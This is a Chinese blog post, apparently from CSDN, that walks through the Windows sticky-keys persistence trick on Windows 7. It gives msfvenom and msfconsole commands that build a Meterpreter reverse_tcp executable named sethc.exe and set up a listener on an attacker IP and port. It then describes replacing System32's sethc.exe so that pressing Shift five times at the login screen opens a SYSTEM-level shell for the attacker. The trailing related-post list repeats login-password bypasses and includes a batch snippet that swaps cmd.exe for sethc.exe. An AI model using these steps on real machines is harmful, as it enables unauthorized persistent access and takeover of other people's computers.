Windows5次shift维权漏洞复现

已于 2024-06-23 17:55:35 修改
阅读量1.4w 收藏 4
点赞数 3
分类专栏: 漏洞复现 文章标签: 安全漏洞 web安全 安全 网络安全
于 2021-07-26 21:38:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangyuxiang946/article/details/119118227
版权

 「作者简介」:冬奥会网络安全中国代表队,CSDN Top100,就职奇安信多年,以实战工作为基础著作 《网络安全自学教程》,适合基础薄弱的同学系统化的学习网络安全,用最短的时间掌握最核心的技术。

操作系统: Windows 7 旗舰版

工具: kali系统的msfconsole

5次shift维权原理

Windows系统中,5次shift键可以触发粘滞键,也就是C:\Windows\System32\sethc.exe,我们将cmd.exe改成sethc.exe并替换掉原来的粘滞键,就可以在登录界面通过5次shift键执行cmd,并且是system权限

除此以外,还可以使用其他工具替换sethc.exe

第一步,使用kali的msfconsole生成木马工具

1.开启MSF

msfconsole

 2.使用开发模块

use exploit/multi/handler

 3.生成木马,lhost写自己的ip,lport写自己的端口,作用是反弹shell到指定ip的端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.18.128 lport=4444 -f exe -o sethc.exe

4.因为我是在桌面打开的终端,生成的木马文件会在用户的根目录下,打开另一个终端查看文件位置

第二步,监听端口,接收反弹的shell

1.生成payload

set payload windows/meterpreter/reverse_tcp

2.设置反弹shell的位置( 自己的ip )

set lhost 192.168.18.128

3.设置反弹的端口

set lport 4444

4.开启监听

exploit

第三步,替换sethc.exe

将生成的木马工具上传到目标主机的c:/windows/system32目录下,并替换原有的sethc.exe

源sethc.exe不能直接修改或删除,需要修改权限

第四步,5次shift触发sethc.exe并反弹shell

1.在目标主机按5次shift触发sethc.exe,没有任何反应,因为程序被替换了

2.查看kali的监听状态,输入 shell 可进入目标主机的命令行,并执行系统命令

士别三日wyx
关注
专栏目录
Windows系统漏洞之5Shift漏洞启动计算机
paidx0
01-26 1万+
一.原理知识 当我们使用计算机时,连续按下5shift键会弹出一个程序 程序名称为“esthc.exe”,其路径为“c:\windows\system32\sethc.exe”。 该系统漏洞由于部分Win7及Win10在未进入系统时,可以通过连续按5shift键弹出 sethc.exe应用程序,然后再深入利用调出CMD窗口,通过指令对用户密码进行修改或删除,从而登录不知道密码的计算机。 首先,在未登录系统时,连续按5shift键,弹出程序 “c:\windows\system32\sethc.ex
Windows权限维持
qq_40012781的博客
07-03 410
Windows权限维持
windows7的5shift实验
weixin_50998641的博客
10-04 1217
原理 在win7的登录界面连续按5shift键会弹出程序c:\windows\system32\sethc.exe 在开启win7时会出现正常登录和尝试修复,在尝试修复界面利用txt文本打开C盘,修改cmd.exe为sethc.exe,并将sethc.exe的名字换掉,这样在连续按5shift后,系统会自动打开cmd.exe,之后可以利用dos命令进行操作,或直接删除原账户密码,或创建另一个账户,赋予管理员权限,从而达到破解win7开机密码的目的。 过程演示 开启win7虚拟机,可以更改一个复杂
[网络安全学习篇附]:利用5shift漏洞破解win7密码(详)
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
04-13 5655
注:分享本实验,只为与大家一起探讨,请勿用作恶意途径。 目录 实验 利用5shift漏洞破解win7密码 漏洞 实验环境: 准备 开始 实验 利用5shift漏洞破解win7密码 漏洞 漏洞1:未登陆系统前连按5shift弹出程序c:\windows\system32\sethc.exe 漏洞2:部分win7及win10系统在未进入系统时,可以通过系统修复漏洞篡改系统文件...
windows系统维权
愿路途漫长,莫失莫忘。 愿不骄不躁,安稳顺心。
09-05 141
C: \Users\用户名\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup #用户级普通权限。C: \ProgramData\Microsoft\Windows\Start Menu\Programs\Startup #系统级,需要system权限。sc create "test" binpath= "C:\Users\Administart\Desktop\shell.exe" #创建服务。重启win10机器,靶机上线。
windows环境变量滥用维权/提权
qq_50854662的博客
09-14 347
windows环境变量滥用维权/提权
34.Windows系统漏洞之5Shift漏洞启动计算机1
08-03
本文主要介绍的是一个针对Windows系统的漏洞利用技巧,称为“5Shift漏洞”,它允许攻击者通过重改CMD来实现修改计算机密码甚至启动计算机。这个漏洞利用方法是一种较为独特的思路,适合网络安全爱好者学习和理解...
利用5shift漏洞破解win7密码
weixin_45970284的博客
04-24 2755
破解windows系统密码 利用5shift漏洞破解win7密码 笔者是一个小白,也是很喜欢网络安全,每就是看到一点就学一点的,只是记录学习的过程,若能帮助到诸位的话,倍感荣幸。 漏洞描述 我们对win7为例进行测试项目,带有漏洞的win7系统,VMware虚拟机: 在未登录系统的界面停留,连按shift键5,弹出粘滞键; // 此为粘滞键的路径 c: \windows\system32\sethc.exe; 这里注意在win7和win10没有进入系统时,可以通过系统修复漏洞篡改文件名进入系统
[漏洞利用]利用五Shift0破解win7\win10开机密码(漏洞复现
qq_44122254的博客
03-21 740
Rdp shift沾滞键漏洞 启动win7在登录页面中,连续点击5shift键,出现此页面 进行非正常关机,在启动是会跳出是否启动修复 启动修复后,过几分钟会弹出,你想使用系统还原计算机么 选择取消 启动修复中,隐藏问题详细信息,点击隐私说明,出现一个txt文档 我们利用txt文档进入文件之中,进入主盘,window下的system32文件夹下 这里注意将文件类型选择所有文件,不然找不到你想要找的sethc和cmd 找到sethc后随意将它改个名字, 然后将cmd重命名为sethc,在此之前
RDP shift后门漏洞
qq_54713392的博客
04-20 544
RDP shift后门漏洞 在win7开机过程中,强制关闭计算机,再开机会出现修复,点启动修复 当它无法修复时会弹出下面的框发送和不发送,这里有查看问题详细信息的按钮 点击该按钮可以看到有一些信息 在信息最下面有个隐私声明的地址 打开这个地址会看到是一个记事本文件,在记事本文件中有文件打开功能 这样我们就进入看到了主机的所有文件,可以进行一些列的工作 这里的D盘实际是主机的C盘 此时它会有一个本地的记事本,可以通过它打开TXT文件。打开Windows->System32文件夹 ,在文件
历史漏洞分析与复现的全部过程
HBohan的博客
02-26 2508
环境需求 系统:Windows10 中间件:https://dlcdn.apache.org/tomcat/tomcat-9/v9.0.58/bin/apache-tomcat-9.0.58-windows-x64.zip 数据库:用phpstudy携带的5.7.26版本即可 jspxcms安装包(部署到Tomcat用来复现):https://www.ujcms.com/uploads/jspxcms-9.0.0-release.zip jspxcms源码包(部署到IDEA进行分析):https://w
html模仿windows窗口_Windows逻辑漏洞Shift后门漏洞新玩法
weixin_39965490的博客
11-30 168
Windows逻辑漏洞Shift后门漏洞新玩法Windows操作系统种有一个很有趣的快捷键,叫做粘滞键,本来是为了不方便人士设计的使用快捷方式键的程序,激活方式是连续点击五Shift键,桌面会弹出一个窗口,我们点击是,就开启了粘滞键平常我们使用组合的快捷键,是需要按下一个键之后不松开,继续按下一个按键才可以激活,开启了粘滞键之后,按下一个键松开,再去按下一个也可以完成组合键的操作,...
5Shift破解Win7登录密码
Mute4ll 's Blog
07-07 2069
破解原理 在windows7登录界面,输入密码时连按5Shift键后,系统会弹出粘滞键提示(如下图所示),如果我们将这个粘滞键进程找到,将其可执行文件替换为cmd.exe,即可在未登录的情况下进入控制台程序修改用户密码或者创建新的用户。 上图显示了在登录界面弹出的粘滞键窗口,可以先注意这个窗口的图标,我们即将寻找到这个图标对应的可执行文件。 如何替换? 原理貌似很简单,但是在没有登录进系统的情况下,我们又如何将粘滞键进程替换为cmd呢?我们这里利用的是记事本文件的打开功能。接下来的目标就是想办法打开一个
[网络安全自学篇] 三十.文件上传漏洞、编辑器漏洞和IIS高版本漏洞及防御(三)
杨秀璋的专栏
12-15 9376
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了文件上传漏洞和IIS6.0解析漏洞,包括PHP345文件绕过上传、Windows ::$DATA绕过、Apache解析漏洞上传等;这篇文章将分享编辑器漏洞和IIS高版本文件上传漏洞,包括FCKeditor、eWebEditor、畸形解析漏洞等,同时结合Caidao工具介绍拿站的流程及防御原理。如果文章对您有帮助,将是我创作的最大动力。
5Shift创建隐藏用户
eonun技术分享点
06-30 356
创建替换脚本文件 @echo off del /q %systemroot%\system32\dllcache\sethc.exe del /q %systemroot%\system32\sethc.exe copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe copy %systemroot%\system32\...
粘滞键漏洞
最新发布
zhuge_long的专栏
08-30 176
原理:利用粘滞键调出cmd,在cmd里对用户进行操作,达到创建,修改用户等目的,从而绕过登录系统的密码,直接用自己创建出来的用户登录计算机。
漏洞复现 | win7粘滞键漏洞复现
made_cola的博客
03-20 1320
粘滞键是一种快捷键,是为同时按下两个或多个键有困难的人而设计的,要功能是方便Shift、Ctrl、Alt与其他键的组合使用。启动粘滞键可通过单击“开始→设置→控制面板→辅助功能选项”,在“键盘”选项卡下选中“使用粘滞键”来启动。或者连续shift键五。开启粘滞键的时候,任务栏右边的系统托盘区会出现粘滞键图标。而攻击者正是利用了其按五shift键出现弹窗的特性对系统进行攻击。
用粘滞键本地破解WINDOWS XP /2003/vista 密码
刘欢的专栏
12-04 4642
________________________________________________________________________________________________________ sanhen版_______________________________________________________________________________________
攻击 | 破解windows7密码(利用5shift漏洞破解win7密码)
热门推荐
ParallelLight
09-02 1万+
攻击 | 破解windows7密码(利用5shift漏洞破解win7密码)引子-破解win7密码背景-虚拟环境原理实现过程 引子-破解win7密码 在学校安排的网络空间安全实训过程中,了解到破解windows密码的相关原理,由于win10会导致个人信息泄露,所以目前的公司依然绝大多数使用的系统为win7系统。 背景-虚拟环境 本破解windows7密码攻击在虚拟机环境中实现 版本:VMwar...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

士别三日wyx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值